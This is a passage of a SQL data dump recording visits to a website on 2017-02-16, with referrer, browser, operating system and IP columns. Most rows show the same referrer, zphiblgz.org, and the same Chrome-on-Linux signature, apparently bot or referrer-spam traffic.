p://zphiblgz.org','Chrome','Linux','43.0.2357.130','','75.119.211.77','000',1,0),(510,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','67.205.25.150','000',1,0),(511,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','194.12.14.68','000',1,0),(512,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','37.59.7.83','000',1,0),(513,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','158.69.244.132','000',1,0),(514,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','50.31.65.7','000',1,0),(515,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','158.69.31.96','000',1,0),(516,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.11.240.163','000',2,0),(517,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','184.164.141.114','000',1,0),(518,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','192.81.209.16','000',1,0),(519,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','192.254.198.109','000',1,0),(520,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.101.157.66','000',1,0),(521,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.140.230.55','000',1,0),(522,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','23.20.40.86','000',1,0),(523,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','23.254.153.202','000',1,0),(524,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','51.255.91.232','000',1,0),(525,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','204.11.58.229','000',1,0),(526,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','173.233.68.74','000',1,0),(527,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','111.118.215.219','000',1,0),(528,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','216.117.144.230','000',1,0),(529,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','198.38.77.142','000',2,0),(530,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','45.113.121.92','000',1,0),(531,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','188.226.179.53','000',1,0),(532,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','50.87.118.73','000',1,0),(533,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','92.60.127.189','000',1,0),(534,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','64.78.12.235','000',1,0),(535,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','167.114.142.241','000',1,0),(536,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','124.47.131.72','000',1,0),(537,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','8.29.143.101','000',1,0),(538,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','64.207.188.213','000',2,0),(539,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','138.201.60.20','000',1,0),(540,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.22.8.72','000',1,0),(541,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','139.59.37.179','000',2,0),(542,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','173.236.184.111','000',1,0),(543,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','94.102.15.78','000',2,0),(544,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','213.202.100.12','000',1,0),(545,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','212.48.69.222','000',2,0),(546,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','213.142.143.105','000',1,0),(547,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','94.152.136.34','000',2,0),(548,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','45.55.138.210','000',1,0),(549,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','46.101.129.60','000',2,0),(550,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','79.172.201.60','000',2,0),(551,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','75.98.175.126','000',1,0),(552,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.24.96.210','000',1,0),(553,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','87.239.23.158','000',2,0),(554,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','41.76.213.16','000',1,0),(555,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','162.144.27.216','000',2,0),(556,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','69.163.160.129','000',3,0),(557,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','31.170.124.238','000',2,0),(558,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','81.169.166.217','000',1,0),(559,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','75.119.200.118','000',1,0),(560,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','192.241.180.242','000',2,0),(561,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','81.88.233.26','000',2,0),(562,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','212.109.217.181','000',2,0),(563,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','200.98.224.31','000',1,0),(564,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','37.97.155.233','000',1,0),(565,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','103.251.134.14','000',1,0),(566,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','213.246.108.37','000',1,0),(567,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','162.144.62.210','000',1,0),(568,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','78.135.108.132','000',1,0),(569,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','208.113.197.91','000',1,0),(570,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','37.97.140.71','000',1,0),(571,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','66.33.212.103','000',1,0),(572,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','104.197.54.33','000',1,0),(573,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','173.236.176.108','000',2,0),(574,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','52.203.91.104','000',1,0),(575,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','204.186.24.129','000',1,0),(576,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','87.255.36.131','000',1,0),(577,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','148.251.12.146','000',1,0),(578,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','75.119.200.124','000',1,0),(579,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','45.55.147.145','000',2,0),(580,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','13.95.225.31','000',2,0),(581,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','188.40.29.168','000',1,0),(582,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','213.251.182.110','000',2,0),(583,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','128.199.241.178','000',2,0),(584,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','173.236.184.108','000',1,0),(585,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','208.113.160.7','000',2,0),(586,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','124.217.241.5','000',2,0),(587,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','69.10.52.18','000',1,0),(588,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','188.166.6.19','000',2,0),(589,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','192.77.116.100','000',2,0),(590,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','149.210.174.205','000',1,0),(591,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','134.76.21.166','000',1,0),(592,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','72.10.51.90','000',1,0),(593,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','217.160.166.101','000',1,0),(594,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.11.240.37','000',1,0),(595,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','62.90.247.54','000',1,0),(596,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','216.157.102.147','000',2,0),(597,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.41.8.174','000',1,0),(598,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','50.62.45.3','000',1,0),(599,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','37.157.240.196','000',3,0),(600,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','212.227.92.106','000',1,0),(601,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','138.201.134.53','000',1,0),(602,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','85.235.131.231','000',2,0),(603,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','104.168.169.95','000',1,0),(604,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','149.62.168.100','000',1,0),(605,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','203.22.132.98','000',1,0),(606,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','170.47.151.68','000',1,0),(607,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','173.44.39.12','000',2,0),(608,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','193.52.94.15','000',1,0),(609,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','183.90.253.19','000',2,0),(610,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','208.113.198.120','000',1,0),(611,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','35.163.216.220','000',2,0),(612,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','198.50.28.253','000',1,0),(613,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.74.38.98','000',1,0),(614,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','91.142.252.26','000',1,0),(615,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','108.174.148.227','000',1,0),(616,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','159.203.104.149','000',1,0),(617,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','184.168.31.19','000',1,0),(618,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','69.163.182.107','000',1,0),(619,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','173.247.249.84','000',1,0),(620,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','69.163.163.224','000',1,0),(621,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','52.7.87.23','000',1,0),(622,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','50.87.127.130','000',1,0),(623,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','87.230.95.58','000',1,0),(624,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','199.167.16.249','000',2,0),(625,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.33.116.38','000',1,0),(626,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','199.195.118.194','000',1,0),(627,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','178.238.222.23','000',1,0),(628,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','5.77.51.20','000',1,0),(629,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','88.208.228.169','000',1,0),(630,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','78.47.199.102','000',1,0),(631,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','45.55.244.9','000',1,0),(632,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','50.22.252.18','000',1,0),(633,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','78.46.157.220','000',2,0),(634,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','167.114.0.96','000',2,0),(635,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','69.87.221.187','000',1,0),(636,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','69.163.180.249','000',1,0),(637,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','193.35.57.194','000',2,0),(638,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','94.152.132.1','000',1,0),(639,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','192.232.195.111','000',1,0),(640,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','216.70.103.29','000',1,0),(641,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.74.38.117','000',1,0),(642,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','176.56.230.165','000',1,0),(643,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','87.106.252.121','000',1,0),(644,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','69.163.152.134','000',2,0),(645,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','189.91.32.59','000',2,0),(646,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','52.0.150.20','000',2,0),(647,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','37.252.121.142','000',1,0),(648,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','208.113.170.20','000',1,0),(649,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','199.79.62.17','000',1,0),(650,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','50.87.52.109','000',1,0),(651,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','81.91.83.113','000',2,0),(652,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','64.118.86.20','000',1,0),(653,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','46.4.168.66','000',1,0),(654,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','212.83.147.135','000',1,0),(655,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','212.48.93.30','000',1,0),(656,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','208.113.198.169','000',1,0),(657,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','149.62.170.242','000',1,0),(658,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','129.232.212.210','000',1,0),(659,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','178.62.239.58','000',1,0),(660,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','80.240.142.33','000',1,0),(661,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','176.34.176.73','000',1,0),(662,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','69.163.152.125','000',1,0),(663,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','37.9.169.21','000',1,0),(664,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','202.52.146.21','000',1,0),(665,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','192.254.159.239','000',1,0),(666,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','79.137.22.122','000',2,0),(667,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','75.119.200.115','000',1,0),(668,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','196.46.186.134','000',1,0),(669,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','85.214.205.218','000',1,0),(670,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','210.48.67.159','000',2,0),(671,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','91.203.146.38','000',1,0),(672,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','62.148.185.13','000',1,0),(673,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','62.232.106.141','000',1,0),(674,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','108.61.184.19','000',1,0),(675,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.74.38.95','000',1,0),(676,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','162.248.242.152','000',1,0),(677,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','208.113.171.103','000',1,0),(678,'2017-02-16','http://zphiblgz.org','Chrome','Android','44.0.2403.133','','66.87.80.183','000',2,0),(679,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','138.201.60.132','000',1,0),(680,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','186.202.161.161','000',1,0),(681,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','198.27.110.171','000',1,0),(682,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','173.245.89.125','000',1,0),(683,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.49.14.108','000',1,0),(684,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','149.210.204.86','000',1,0),(685,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','64.111.127.8','000',1,0),(686,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','128.199.89.112','000',1,0),(687,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','50.116.104.247','000',1,0),(688,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','162.249.125.17','000',1,0),(689,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','69.163.187.50','000',1,0),(690,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','66.201.99.96','000',1,0),(691,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','162.243.206.157','000',1,0),(692,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','104.130.9.198','000',1,0),(693,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','37.97.145.6','000',1,0),(694,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','87.253.162.13','000',1,0),(695,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','188.65.117.70','000',2,0),(696,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.74.38.180','000',1,0),(697,'2017-02-16','https://www.google.com/','Chrome','Windows','56.0.2924.87','','198.179.4.253','000',2,0),(698,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','159.203.63.126','000',1,0),(699,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','64.111.127.77','000',2,0),(700,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','50.62.8.224','000',1,0),(701,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','166.62.122.159','000',1,0),(702,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','128.199.224.78','000',1,0),(703,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.34.192.84','000',1,0),(704,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','46.32.225.133','000',1,0),(705,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','74.220.219.63','000',1,0),(706,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','166.62.46.197','000',1,0),(707,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','72.10.55.62','000',1,0),(708,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','75.119.198.100','000',1,0),(709,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','172.96.12.100','000',1,0),(710,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','109.203.126.98','000',1,0),(711,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','173.236.224.138','000',1,0),(712,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','23.29.52.2','000',1,0),(713,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.103.119.4','000',1,0),(714,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','213.202.100.9','000',1,0),(715,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.56.147.215','000',2,0),(716,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','64.78.2.230','000',1,0),(717,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','134.0.91.35','000',2,0),(718,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','148.251.194.200','000',1,0),(719,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','212.227.107.160','000',1,0),(720,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','63.238.52.119','000',1,0),(721,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','173.236.170.203','000',1,0),(722,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','89.145.92.137','000',1,0),(723,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','66.147.244.233','000',1,0),(724,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','94.23.18.131','000',1,0),(725,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','106.185.36.67','000',1,0),(726,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','64.90.48.219','000',1,0),(727,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','67.205.11.244','000',1,0),(728,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','206.123.104.4','000',1,0),(729,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','158.69.241.2','000',2,0),(730,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','107.6.185.18','000',1,0),(731,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','97.64.154.158','000',1,0),(732,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','78.46.182.139','000',1,0),(733,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','182.163.56.141','000',1,0),(734,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','50.87.15.38','000',1,0),(735,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','208.113.163.100','000',2,0),(736,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','216.157.102.20','000',2,0),(737,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','178.79.156.60','000',1,0),(738,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','168.1.77.39','000',1,0),(739,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','81.177.6.49','000',1,0),(740,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','103.195.239.135','000',1,0),(741,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','50.87.53.222','000',1,0),(742,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','166.62.32.235','000',1,0),(743,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','198.46.237.228','000',1,0),(744,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','192.163.200.54','000',1,0),(745,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','188.165.219.26','000',1,0),(746,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','109.104.79.189','000',1,0),(747,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','98.142.221.131','000',1,0),(748,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','198.1.67.216','000',1,0),(749,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','85.158.249.7','000',1,0),(750,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','138.68.88.243','000',1,0),(751,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','167.114.126.74','000',1,0),(752,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','95.142.154.232','000',1,0),(753,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','217.170.198.19','000',1,0),(754,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','92.53.96.10','000',1,0),(755,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','176.223.207.124','000',1,0),(756,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','52.55.243.247','000',2,0),(757,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','108.168.213.91','000',1,0),(758,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','206.126.49.36','000',2,0),(759,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','178.62.200.16','000',1,0),(760,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','52.211.167.226','000',1,0),(761,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','210.48.67.195','000',1,0),(762,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','45.55.174.165','000',1,0),(763,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','37.123.99.171','000',1,0),(764,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','216.172.182.189','000',1,0),(765,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','120.138.19.101','000',1,0),(766,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','64.140.200.40','000',1,0),(767,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','192.235.77.205','000',1,0),(768,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','188.165.229.55','000',1,0),(769,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.21.41.111','000',1,0),(770,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','208.113.170.112','000',1,0),(771,'2017-02-16','zphiblgz.org','Chrome','Windows','50.0.2661.75','','162.243.217.76','000',1,0),(772,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','69.163.194.31','000',2,0),(773,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.104.28.59','000',1,0),(774,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','63.254.158.200','000',1,0),(775,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.26.90.53','000',1,0),(776,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','178.32.203.17','000',1,0),(777,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','216.131.94.96','000',1,0),(778,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','173.236.145.211','000',1,0),(779,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','187.84.227.180','000',1,0),(780,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','37.140.192.92','000',1,0),(781,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','78.31.117.151','000',1,0),(